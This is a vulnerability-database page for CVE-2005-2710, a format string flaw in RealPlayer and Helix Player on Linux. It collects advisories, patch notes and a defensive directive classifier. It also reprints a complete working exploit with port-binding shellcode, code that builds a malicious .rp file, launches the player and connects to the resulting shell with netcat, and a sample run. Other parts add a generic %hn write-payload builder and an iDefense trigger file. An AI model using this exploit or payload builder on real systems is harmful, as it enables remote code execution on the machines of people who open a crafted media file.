CVE-2005-2710
CVSS 5.1
Published: 2005-09-27 16:03:00
Revised: 2016-10-17 23:29:36

[Original] Format string vulnerability in Real HelixPlayer and RealPlayer 10 allows remote attackers to execute arbitrary code via the (1) image handle or (2) timeformat attribute in a RealPix (.rp) or RealText (.rt) file.


[CNNVD] RealNetworks RealPlayer and Helix Player format string handling vulnerability (CNNVD-200509-260)

        RealPlayer and Helix Player are widely used media players that support many media formats.
        Both contain a format string vulnerability that a remote attacker could use to take control of the machine. The root cause is a failure to validate user input: a remote attacker can supply format specifiers directly to a formatted printing function, leading to arbitrary code execution.

- CVSS (base score)

CVSS score: 5.1 [MEDIUM]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/a:realnetworks:helix_player
cpe:/a:realnetworks:realplayer:10.0 (RealNetworks RealPlayer 10.0)

- OVAL (technical details for detection)

oval:org.mitre.oval:def:11015 Format string vulnerability in Real HelixPlayer and RealPlayer 10 allows remote attackers to execute arbitrary code via the (1) image handle...
*OVAL describes in detail how to detect this vulnerability; see the referenced OVAL definition for further technical detail on detection.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2710
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2710
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200509-260
(official data source) CNNVD

- Other links and resources

http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=168078
(VENDOR_ADVISORY)  CONFIRM  http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=168078
http://marc.info/?l=bugtraq&m=112785544325326&w=2
(UNKNOWN)  BUGTRAQ  20050926 RealPlayer && HelixPlayer Remote Format String Exploit
http://marc.info/?l=full-disclosure&m=112775929608219&w=2
(UNKNOWN)  FULLDISC  20050926 RealPlayer && HelixPlayer Remote Format String
http://securityreason.com/securityalert/27
(UNKNOWN)  SREASON  27
http://securityreason.com/securityalert/41
(UNKNOWN)  SREASON  41
http://www.debian.org/security/2005/dsa-826
(VENDOR_ADVISORY)  DEBIAN  DSA-826
http://www.gentoo.org/security/en/glsa/glsa-200510-07.xml
(UNKNOWN)  GENTOO  GLSA-200510-07
http://www.idefense.com/application/poi/display?id=311&type=vulnerabilities
(VENDOR_ADVISORY)  IDEFENSE  20050930 RealNetworks RealPlayer/HelixPlayer RealPix Format String Vulnerability
http://www.kb.cert.org/vuls/id/361181
(VENDOR_ADVISORY)  CERT-VN  VU#361181
http://www.novell.com/linux/security/advisories/2005_59_RealPlayer.html
(UNKNOWN)  SUSE  SUSE-SA:2005:059
http://www.open-security.org/advisories/13
(VENDOR_ADVISORY)  MISC  http://www.open-security.org/advisories/13
http://www.redhat.com/support/errata/RHSA-2005-762.html
(UNKNOWN)  REDHAT  RHSA-2005:762
http://www.redhat.com/support/errata/RHSA-2005-788.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2005:788

- Vulnerability information

RealNetworks RealPlayer and Helix Player format string handling vulnerability
Medium severity; format string
2005-09-27 00:00:00 2006-01-05 00:00:00
Remote

- Advisories and patches

        No data available

- Vulnerability information (1232)

RealPlayer/Helix Player Remote Format String Exploit (linux) (EDBID:1232)
linux remote
2005-09-26 Verified
0 c0ntex
N/A [Download]
/*
  *****************************************************************************************************************
  $ An open security advisory #13 - RealPlayer and Helix Player Remote Format String Exploit
  *****************************************************************************************************************
  1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com
  2: Bug Released: September 26th 2005
  3: Bug Impact Rate: Hi
  4: Bug Scope Rate: Remote
  *****************************************************************************************************************
  $ This advisory and/or proof of concept code must not be used for commercial gain.
  *****************************************************************************************************************

  UNIX RealPlayer && Helix Player
  http://real.com
  http://helixcommunity.org

  "The Helix Player is the Helix Community's open source media player for consumers. It is being developed
  to have a rich and usable graphical interface and support a variety of open media formats like Ogg Vorbis,
  Theora etc. 
  The RealPlayer for Linux is built on top of the Helix Player for Linux and includes support for several
  non-open source components including RealAudio/RealVideo, MP3 etc."

  There is a remotely exploitable format string vulnerability in the latest Helix Media Player suite that will
  allow an attacker the possibility to execute malicious code on a victim's computer. The exploit code will
  execute a remote shell under the permissions of the user running the media player, and affects all versions
  of RealPlayer and Helix Player.

  The bug is exploitable by abusing media, including .rp (realpix) and .rt (realtext) file formats. Although
  others may be affected I stick to the realpix file format for this advisory.

  Almost all media file input is placed on the heap, so it's not possible to just pop our way to a supplied
  string like with a normal stack based format bug, as such we can't directly modify GOT, DTORS, etc. leaving
  us limited to what we can do.

  There are several places where we can control the flow of execution:

       popN - call *0x04(eax) - eax is controlled
       popN+N - call *0x20(eax) - eax is controlled
       popN+NN - call *0x100(edx) - edx is controlled
       popN+NNN - ebp - ebp is controlled
       popN+NNNN - eip - eip is controlled
       ....

  however since we are limited to the size of the value that can be written, it doesn't seem possible to
  point at a known good location directly. Since our shellcode is always mapped via the .rp file between
  0x0822**** - 0x082f**** and with control of one pointer at a time usually, we can not reach the LSB, we
  are toast.

  In a phrack paper, Riq talks about using sections of the base pointer to create a 4 byte pointer by
  chaining EBP like so:

  [Frame 10 EBP]--points to-->[Frame 11 EBP]--points to-->[Frame 12 EBP]

  And can be manipulated something like so:

  --------     --------     --------
  Frame 10     Frame 11     Frame 12
  --------     --------     --------
                1|------------\/
  [LSBMSB]     [LSBMSB]--   [41414141]
      2|____________^  3|__________^ 

  Well, it doesn't work :-( ..ebp gets moved to esp in frame 11 and it ends with EIP pointing at 0x00000000.

  So what else can I do?

  How about use the fact the file being played is under my control and only the MSB needs overwriting. This
  solves the problem with the size of the value I can write. It is possible to modify the MSB of an EBP
  that is reachable, eventually leading to EIP pointing at some good location after "mov %ebp,%esp" happens,
  resulting in the execution of our shellcode.

	1-> Create a file with shellcode address `printf "\x37\x13\x12\x08"`.rp
	2-> Overwrite EBP MSB with the address of the file location on the stack
	3-> EBP is moved to ESP
	4-> EIP is changed to ESP value
	5-> EIP is owned, shell is spawned

  Granted this is not a stable method as the user can freely manipulate their environment, and we use the
  file name, which is stored in an environment variable to trampoline us to the shellcode. However my goal
  here is not to create a worm but a proof-of-concept  :p 

  The supplied POC should work flawlessly on Debian 3.1, with RealPlayer installed in /usr/local/RealPlayer
  and run as shown below.

  Sample local run:

  Test System: Debian 3.1 against RealPlayer10.0.5.756 Gold

  Window 1:
  ---------
  c0ntex@debauch:~$ netstat -an --ip
  Active Internet connections (servers and established)
  Proto Recv-Q Send-Q Local Address           Foreign Address         State
  tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
  tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN
  tcp        0      0 192.168.88.133:22       192.168.88.1:2080       ESTABLISHED
  udp        0      0 0.0.0.0:68              0.0.0.0:*
  c0ntex@debauch:~$ ./helix4real

  Remote format string exploit POC for UNIX RealPlayer && HelixPlayer
  Code tested on Debian 3.1 against RealPlayer 10 Gold's latest version
  by c0ntex || c0ntexb@gmail.com || http://www.open-security.org

  [-] Creating file [VY~Ò.rp]
  [-] Using [148] stack pops
  [-] Modifying EBP MSB with value [64105]
  [-] Completed creation of test file!
  [-] Executing RealPlayer now...
  [-] Connecting to shell in 10 seconds
  ** YOU MIGHT HAVE TO HIT RETURN ON REALPLAYER WINDOW ** 

  (realplay.bin:22202): Pango-WARNING **: Invalid UTF-8 string passed to pango_layout_set_text()

  (realplay.bin:22202): Pango-WARNING **: Invalid UTF-8 string passed to pango_layout_set_text()

  ps -ef | tail -12;
  ...
  c0ntex    1631  1624  0 01:10 pts/2    00:00:00 /bin/sh /usr/bin/realplay ./VYF&(?.rp
  c0ntex    1636  1631  4 01:10 pts/2    00:00:02 /bin//sh
  c0ntex    1637  1636  0 01:10 pts/2    00:00:00           ?   ²úÿ¿f   ? ?\    ?   ?       .rp
  c0ntex    1638  1637  0 01:10 pts/2    00:00:00           ?   ²úÿ¿f   ? ?\    ?   ?       .rp
  c0ntex    1639  1636  0 01:10 pts/2    00:00:00 /usr/local/RealPlayer/realplay.bin ./VYF&(?.rp
  c0ntex    1640  1636  0 01:10 pts/2    00:00:00 /usr/local/RealPlayer/realplay.bin ./VYF&(?.rp
  c0ntex    1641  1637  0 01:10 pts/2    00:00:00           ?   ²úÿ¿f   ? ?\    ?   ?       .rp
  c0ntex    1642  1637  0 01:10 pts/2    00:00:00           ?   ²úÿ¿f   ? ?\    ?   ?       .rp
  c0ntex    1643  1637  0 01:10 pts/2    00:00:00           ?   ²úÿ¿f   ? ?\    ?   ?       .rp
  ...

  To exploit this remotely, a user just needs to place the created file on a web site and provide a link so
  users can click the file, launching RealPlayer and exploiting the vulnerability.

  Real have been duly informed about this issue and are fixing. Sadly though, it seems someone is trying to
  pinch my research, as such I have been forced to release this advisory sooner than hoped. Until Real get
  a new release out, do not play untrusted media with RealPlayer or HelixPlayer. Sorry Real.com!

  Moral of the story, don't talk about personal research on IRC. Thank you plagiarizers.

  PS: A new RSS feed for the latest 5 Open Security Group Advisories, @ http://www.open-security.org/adv.xml
  is now available.

 */


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BUFFER          10000     /* NOP sled + shellcode carried in the name attribute */
#define EBPMSB          64105     /* 16-bit value %hn stores into the upper half of the saved EBP */
#define HOST            "localhost"
#define NETCAT          "/bin/nc"
#define NOPS            0x90
#define STACKPOP        148       /* positional argument index of the stack slot %hn writes through */
#define VULN            "/usr/local/RealPlayer/realplay"

/* The file name is the trampoline: its bytes (an address) are visible on the
   stack via the environment, which is where the patched EBP/ESP ends up. */
char filename[]="\x56\x59\x14\x82\x26\x08\x2e\x72\x70";

/* metasploit port binding shellcode = 4444 */
char hellcode[]="\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66"
                "\x58\x99\x89\xe1\xcd\x80\x96\x43\x52"
                "\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a"
                "\x66\x58\x50\x51\x56\x89\xe1\xcd\x80"
                "\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56"
                "\x43\x89\xe1\xb0\x66\xcd\x80\x93\x6a"
                "\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9"
                "\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68"
                "\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89"
                "\xe1\xcd\x80";


int
filegen(char *shellcode)
{
     FILE *rp;

     printf("[-] Creating file [%s]\n", filename);

     rp = fopen(filename, "w");
     if(!rp) {
           puts("[!] Could not fopen file!");
           free(shellcode);
           return(EXIT_FAILURE);
     }

     printf("[-] Using [%d] stack pops\n[-] Modifying EBP MSB with value [%d]\n", STACKPOP, EBPMSB);

     /* The handle attribute expands to "%.64105u%148$hn": the padded %u drives
        printf's character counter to EBPMSB and %hn stores that counter into the
        16 bits pointed to by stack slot 148 (the saved EBP's upper half). The
        sled and shellcode ride along in the name attribute. */
     fprintf(rp,
                     "<imfl>\n"
                     "<head\n"
                     "duration=\"1:33.7\"\n"
                     "timeformat=\"dd:hh:mm:ss.xyz\"\n"
                     "preroll=\"1:33.7\"\n"
                     "bitrate=\"1337\"\n"
                     "width=\"69\"\n"
                     "height=\"69\"\n"
                     "aspect=\"\"\n"
                     "url=\"http://www.open-security.org\"/>\n"
                     "<image handle=\"%%.%du%%%d$hn\" name=\"findme%s\"/>\n"
                     "<fadein start=\"0\" duration=\"0:01\" target=\"2\"/>\n"
                     "</imfl>", EBPMSB, STACKPOP, shellcode);
      fclose(rp);

      free(shellcode); shellcode = NULL;

      return(EXIT_SUCCESS);
}


int
main(int argc, char **argv)
{
     char *shellcode = NULL;

     puts("\nRemote format string exploit POC for UNIX RealPlayer && HelixPlayer");
     puts("Code tested on Debian 3.1 against RealPlayer 10 Gold's latest version");
     puts("by c0ntex || c0ntexb@gmail.com || http://www.open-security.org\n");

     /* One extra byte for the terminator: with malloc(BUFFER) the
        shellcode[BUFFER] = '\0' below is a one-byte heap overflow. */
     shellcode = (char *)malloc(BUFFER + 1);
     if(!shellcode) {
           puts("[!] Could not malloc");
           return(EXIT_FAILURE);
     }

     memset(shellcode, NOPS, BUFFER);
     memcpy(&shellcode[BUFFER-strlen(hellcode)], hellcode, strlen(hellcode));
     shellcode[BUFFER] = '\0';

     /* filegen() owns the buffer from here on and frees it on both paths */
     if(filegen(shellcode) != EXIT_SUCCESS)
           return(EXIT_FAILURE);

     puts("[-] Completed creation of test file!\n[-] Executing RealPlayer now...");

     switch(fork()) {
            case -1:
                    puts("[!] Could not fork off, bailing!");
                    return(EXIT_FAILURE);
            case 0:
                    if(execl(VULN, "realplay", filename, (char *)NULL) <0) {
                            puts("[!] Could not execute realplayer... :(");
                            _exit(EXIT_FAILURE);
                    }
     }

     puts("[-] Connecting to shell in 10 seconds\n** YOU MIGHT HAVE TO HIT RETURN ON REALPLAYER WINDOW **");
     sleep(10);

     if(execl(NETCAT, "nc", HOST, "4444", (char *)NULL) <0) {
            puts("[!] Could not connect, check the core file!");
            return(EXIT_FAILURE);
     }

     return(EXIT_SUCCESS);
}

// milw0rm.com [2005-09-26]
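The PoC's handle attribute expands to `%.64105u%148$hn`, a single short write: the padded `%u` drives printf's character counter to EBPMSB and `%hn` stores the low 16 bits of that counter through the pointer found in stack slot 148. The following is an added example, not part of c0ntex's advisory or exploit, that generalizes the same primitive to a full 32-bit value with two `%hn` writes: it emits the smaller half first (the counter only grows), and adds 0x10000 whenever the needed padding would fall below the ten digits a 32-bit `%u` may print, which `%hn` truncates away. Unlike the PoC, every conversion is positional (`%1$.Nu` rather than `%.Nu`), which POSIX requires once any `$` appears; the PoC's mixed form relies on glibc tolerating it. The argument indices (1, 2, 3) and reuse of the advisory's 0x08121337 as the value are assumptions for the demonstration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Build a fully positional format string that writes the 32-bit `value` with two %hn
   short writes. idx_lo / idx_hi: positional argument indices whose slots hold pointers
   to the low and high 16-bit halves of the target; pad_idx: any integer-typed slot that
   the padding conversions may consume; already: characters printed before the payload.
   Returns the payload length, or -1 if `out` is too small. */
int fmt_build_short_writes(uint32_t value, unsigned idx_lo, unsigned idx_hi,
                           unsigned pad_idx, unsigned already, char *out, size_t outsz)
{
    unsigned lo = value & 0xffffu, hi = value >> 16;

    /* %hn stores the running character count, which never decreases: write the
       smaller half first so the second write only has to add to the count. */
    unsigned first_val = lo, first_idx = idx_lo, second_val = hi, second_idx = idx_hi;
    if (hi < lo) {
        first_val = hi; first_idx = idx_hi;
        second_val = lo; second_idx = idx_lo;
    }

    unsigned count = already & 0xffffu;
    unsigned pad1 = (first_val - count) & 0xffffu;
    /* %.Nu prints at least as many digits as its argument has (up to 10 for 32 bits),
       so a precision below 10 would emit an unpredictable count. Adding 0x10000 keeps
       the precision exact and is invisible to a 16-bit %hn write. */
    if (pad1 < 10) pad1 += 0x10000u;
    count = (count + pad1) & 0xffffu;
    unsigned pad2 = (second_val - count) & 0xffffu;
    if (pad2 < 10) pad2 += 0x10000u;

    int n = snprintf(out, outsz, "%%%u$.%uu%%%u$hn%%%u$.%uu%%%u$hn",
                     pad_idx, pad1, first_idx, pad_idx, pad2, second_idx);
    return (n > 0 && (size_t)n < outsz) ? n : -1;
}

/* Stand-alone run: execute the payload against two 16-bit halves of a local target.
   glibc's fortified printf (gcc -O1 or higher with _FORTIFY_SOURCE, the default on most
   distributions) aborts on %n coming from a writable format buffer, which is itself a
   mitigation worth knowing; build with -O0 or -U_FORTIFY_SOURCE to see the write land. */
int main(void)
{
    uint16_t halves[2] = {0, 0};                  /* simulated target, low half first */
    char fmt[96], sink[32];
    uint32_t target = 0x08121337u;                /* shellcode address used in the advisory text */

    if (fmt_build_short_writes(target, 2, 3, 1, 0, fmt, sizeof fmt) < 0) return 1;
    printf("payload: %s\n", fmt);
    /* arg 1 feeds the padding %u, args 2 and 3 are the %hn destinations; snprintf's size
       limit does not matter because %n counts characters that would have been written. */
    snprintf(sink, sizeof sink, fmt, 0u, &halves[0], &halves[1]);
    printf("written: 0x%08x\n", halves[0] | ((uint32_t)halves[1] << 16));
    return 0;
}
```

For the advisory's own constants the builder would produce `%1$.64105u%148$hn`-style output with the padding slot made explicit; the payload is only as good as the stack-slot indices, which have to be found by leaking stack words with `%N$x` first, exactly the "stack pops" the PoC hard-codes as 148.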
		

- Vulnerability information (F40503)

Gentoo Linux Security Advisory 200510-7 (PacketStormID:F40503)
2005-10-08 00:00:00
Gentoo  security.gentoo.org
advisory,overflow
linux,gentoo
CVE-2005-2710
[Download]

Gentoo Linux Security Advisory GLSA 200510-07 - c0ntex reported that RealPlayer and Helix Player suffer from a heap overflow. Versions less than 10.0.6 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200510-07
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: RealPlayer, Helix Player: Format string vulnerability
      Date: October 07, 2005
      Bugs: #107309
        ID: 200510-07

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

RealPlayer and Helix Player are vulnerable to a format string
vulnerability resulting in the execution of arbitrary code.

Background
==========

RealPlayer is a multimedia player capable of handling multiple
multimedia file formats. Helix Player is an open source media player
for Linux.

Affected packages
=================

    -------------------------------------------------------------------
     Package                  /  Vulnerable  /              Unaffected
    -------------------------------------------------------------------
  1  media-video/realplayer       < 10.0.6                   >= 10.0.6
  2  media-video/helixplayer       < 1.0.6                    >= 1.0.6
    -------------------------------------------------------------------
     2 affected packages on all of their supported architectures.
    -------------------------------------------------------------------

Description
===========

"c0ntex" reported that RealPlayer and Helix Player suffer from a heap
overflow.

Impact
======

By enticing a user to play a specially crafted realpix (.rp) or
realtext (.rt) file, an attacker could execute arbitrary code with the
permissions of the user running the application.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All RealPlayer users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=media-video/realplayer-10.0.6"

All Helix Player users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=media-video/helixplayer-1.0.6"

References
==========

  [ 1 ] CAN-2005-2710
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2710

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200510-07.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2005 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0

    

- Vulnerability information (F40433)

iDEFENSE Security Advisory 2005-09-30.t (PacketStormID:F40433)
2005-10-06 00:00:00
iDefense Labs  idefense.com
advisory,remote,arbitrary
linux
CVE-2005-2710
[Download]

iDEFENSE Security Advisory 09.30.05 - Remote exploitation of a format string vulnerability in RealPix (.rp) file format parser within various versions of RealNetworks Inc.'s RealPlayer could allow attackers to execute arbitrary code. The vendor has indicated that the following versions are vulnerable: Linux RealPlayer 10 (10.0.0 - 10.0.5), Helix Player (10.0.0 - 10.0.5).

RealNetworks RealPlayer/HelixPlayer RealPix Format String Vulnerability 

iDEFENSE Security Advisory 09.30.05
www.idefense.com/application/poi/display?id=311&type=vulnerabilities
September 30, 2005

I. BACKGROUND

RealPlayer is an application for playing various media formats,
developed by RealNetworks Inc. For more information, visit
http://www.real.com/.

II. DESCRIPTION

Remote exploitation of a format string vulnerability in RealPix (.rp) 
file format parser within various versions of RealNetworks Inc.'s 
RealPlayer could allow attackers to execute arbitrary code. 

The vulnerability specifically exists because of the improper usage of a
formatted printing function. When a user specifies an invalid value for
the "timeformat" attribute describing a RealPix file, the data is passed
to the function.

The following stripped down .rp file is sufficient to trigger the
vulnerability:

   <imfl>
   <head 
   title="iDEFENSE Labs RealPix Vulnerability"
   timeformat="%n%n%n%n%n%n"/>
   </imfl> 


III. ANALYSIS

Exploitation allows for arbitrary code execution as the user who opened
the .rp file.

Exploitation requires an attacker to craft a malicious .rp file and
convince a user to open it. An attacker could also trick a user to load 
the .rp file from a normal web page under the attacker's control; this 
is possible if the user has configured their web browser to handle 
RealPlayer formats automatically.

IV. DETECTION

iDEFENSE Labs has confirmed that RealPlayer 10.0.4.750 on Linux is 
vulnerable. Windows and Mac versions of RealPlayer are not vulnerable. 
FreeBSD versions are suspected vulnerable.

The vendor has indicated that the following versions are vulnerable:
   Linux RealPlayer 10 (10.0.0 - 10.0.5)
   Helix Player (10.0.0 - 10.0.5)

The following vendors include susceptible RealPlayer packages within
their respective distributions:

	The FreeBSD Project: FreeBSD 5.3 and earlier
	Novell Inc.: SuSE Linux 9.2 
	Red Hat Inc.: Desktop v.3 and v.4,
	   Enterprise Linux AS/ES/WS v.3 and v.4 and Fedora Core 3,
	   Linux 7.3 and 9 

V. WORKAROUND

Filter .rp attachments at e-mail gateways. Educate users about the risks
of accepting files from untrusted individuals.

VI. VENDOR RESPONSE

The vendor had released the following advisory for this vulnerability:

   http://service.real.com/help/faq/security/050930_player/EN/

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2005-2710 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

08/23/2005  Initial vendor notification
09/02/2005  Initial vendor response
09/30/2005  Coordinated public disclosure

IX. CREDIT

iDEFENSE Labs is credited with this discovery.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright (c) 2005 iDEFENSE, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDEFENSE. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
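Added example (not code from iDefense, RealNetworks or the Helix project) modelling the sink the advisory describes and the CNNVD summary paraphrases: a `<head>` attribute value reaching a printf-family function as its format string. It pulls the `timeformat` attribute out of the trigger file reproduced above, shows the vulnerable call beside the hardened `"%s"` form, and classifies the directives in an untrusted value, which is the check a mail-gateway filter (the advisory's workaround) or a file scanner would apply. The attribute extractor, the `render` helper standing in for the player's error-message routine, and the three-level risk score are assumptions made for illustration; the sample document is the advisory's own trigger file.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Sample input copied from the iDefENSE advisory's stripped-down trigger file. */
static const char SAMPLE_RP[] =
    "<imfl>\n"
    "<head \n"
    "title=\"iDEFENSE Labs RealPix Vulnerability\"\n"
    "timeformat=\"%n%n%n%n%n%n\"/>\n"
    "</imfl>\n";

/* Copy the value of the first attr="value" pair in doc into out (1 = found).
   Deliberately minimal: no entity decoding and no real XML parsing. */
int rp_get_attr(const char *doc, const char *attr, char *out, size_t outsz)
{
    char key[64];
    if (snprintf(key, sizeof key, "%s=\"", attr) >= (int)sizeof key) return 0;
    const char *p = strstr(doc, key);
    if (!p) return 0;
    p += strlen(key);
    const char *q = strchr(p, '"');
    if (!q || (size_t)(q - p) >= outsz) return 0;
    memcpy(out, p, (size_t)(q - p));
    out[q - p] = '\0';
    return 1;
}

/* Hypothetical error-message helper standing in for the player's formatted print. */
static int render(char *buf, size_t n, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int r = vsnprintf(buf, n, fmt, ap);
    va_end(ap);
    return r;
}

/* Vulnerable pattern: the attribute value is the format string, so "%x" leaks
   stack words and "%n"/"%hn" store the character count through a stack pointer. */
int report_timeformat_vuln(char *buf, size_t n, const char *timeformat)
{
    return render(buf, n, timeformat);
}

/* Hardened pattern: the value is only ever an argument to a literal format. */
int report_timeformat_safe(char *buf, size_t n, const char *timeformat)
{
    return render(buf, n, "%s", timeformat);
}

/* Classify printf directives in an untrusted string:
   0 = none ("%%" is a literal percent), 1 = read-only conversions (stack leak),
   2 = a %n-family conversion (memory write primitive). */
int fmt_directive_risk(const char *s)
{
    int risk = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%') continue;
        if (p[1] == '%') { p++; continue; }
        const char *q = p + 1;
        while (*q && strchr("-+ #0123456789.*$hlLqjzt", *q)) q++;  /* flags, width, precision, length */
        if (!*q) break;                                             /* truncated directive */
        if (*q == 'n') return 2;
        risk = 1;
        p = q;
    }
    return risk;
}

int main(void)
{
    char value[128], out[128];
    if (!rp_get_attr(SAMPLE_RP, "timeformat", value, sizeof value)) return 1;
    printf("timeformat=\"%s\" risk=%d\n", value, fmt_directive_risk(value));
    /* The vulnerable sink is not called on this value: six %n writes through whatever
       the stack holds is exactly the crash the advisory describes. */
    report_timeformat_safe(out, sizeof out, value);
    printf("safe render: %s\n", out);
    return 0;
}
```

The contrast is visible even without a crash: `report_timeformat_vuln` turns `"100%% done"` into `100% done` because the sink interprets the value, while `report_timeformat_safe` passes it through unchanged. A risk of 2 on a `timeformat` or `handle` attribute is a strong signal for a gateway filter; a risk of 1 is still worth flagging, since `%N$x` reads are how the stack-slot index for the write is found.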
    

- Vulnerability information (F40361)

Debian Linux Security Advisory 826-1 (PacketStormID:F40361)
2005-10-04 00:00:00
Debian  security.debian.org
advisory,vulnerability
linux,debian
CVE-2005-1766,CVE-2005-2710
[Download]

Debian Security Advisory DSA 826-1 - Multiple security vulnerabilities have been identified in the helix-player media player that could allow an attacker to execute code on the victim's machine via specially crafted network resources.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 826-1                     security@debian.org
http://www.debian.org/security/                              Michael Stone
September 29th, 2005                    http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : helix-player
Vulnerability  : multiple
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CAN-2005-1766 CAN-2005-2710
Debian Bug     : 316276 330364

Multiple security vulnerabilities have been identified in the
helix-player media player that could allow an attacker to execute code
on the victim's machine via specially crafted network resources.

CAN-2005-1766

        Buffer overflow in the RealText parser could allow remote code
        execution via a specially crafted RealMedia file with a long
        RealText string.

CAN-2005-2710

        Format string vulnerability in Real HelixPlayer and RealPlayer 10
        allows remote attackers to execute arbitrary code via the image
        handle attribute in a RealPix (.rp) or RealText (.rt) file.

For the stable distribution (sarge), these problems have been fixed in
version 1.0.4-1sarge1

For the unstable distribution (sid), these problems have been fixed in
version 1.0.6-1

We recommend that you upgrade your helix-player package.


Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- --------------------------------

helix-player was distributed only on the i386 and powerpc architecures

  Source archives:

    http://security.debian.org/pool/updates/main/h/helix-player/helix-player_1.0.4-1sarge1.dsc
      Size/MD5 checksum:      908 6ff062a280bab4db79c04e08278e28d6
    http://security.debian.org/pool/updates/main/h/helix-player/helix-player_1.0.4-1sarge1.diff.gz
      Size/MD5 checksum:     7788 1e3280253e2d60701b28b153863b2fd0
    http://security.debian.org/pool/updates/main/h/helix-player/helix-player_1.0.4.orig.tar.gz
      Size/MD5 checksum: 18044552 a277710be35426b317869503a4ad36d7

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/h/helix-player/helix-player_1.0.4-1sarge1_i386.deb
      Size/MD5 checksum:  4289094 b3d2934818a2139f309f77e4acd50e3d

  PowerPC architecture:

    http://security.debian.org/pool/updates/main/h/helix-player/helix-player_1.0.4-1sarge1_powerpc.deb
      Size/MD5 checksum:  4415404 f771482fd671da4848d6a496df128f69

  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (GNU/Linux)

iQCVAwUBQzx/AA0hVr09l8FJAQLkTAP+K1+4HF3DWTLnS3QX8Kd595rwXm60KYRj
6eDJtqs+2mhlLXLdsUPZS+wciEA7jirjXk5dGb+wgNAAhKpP5BxfX4jeLV0mgn1l
sWI1917bK1F/IISKdOlwLUG/c7nnCpJ3VBiqAfSAkcu6brUzI3fRMTej3DBCtcx1
h3S88TEoI/A=
=XoVE
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
    

- Vulnerability information

19695
RealPlayer invalid-handle Error Message Format String
Local / Remote, Context Dependent Input Manipulation
Loss of Integrity
Vendor Verified

- Vulnerability description

- Timeline

2005-09-26 Unknown
Unknown 2005-09-27

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, RealNetworks has released a patch to address this vulnerability.

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

RealNetworks RealPlayer And Helix Player Format String Vulnerability
Input Validation Error 14945
Yes No
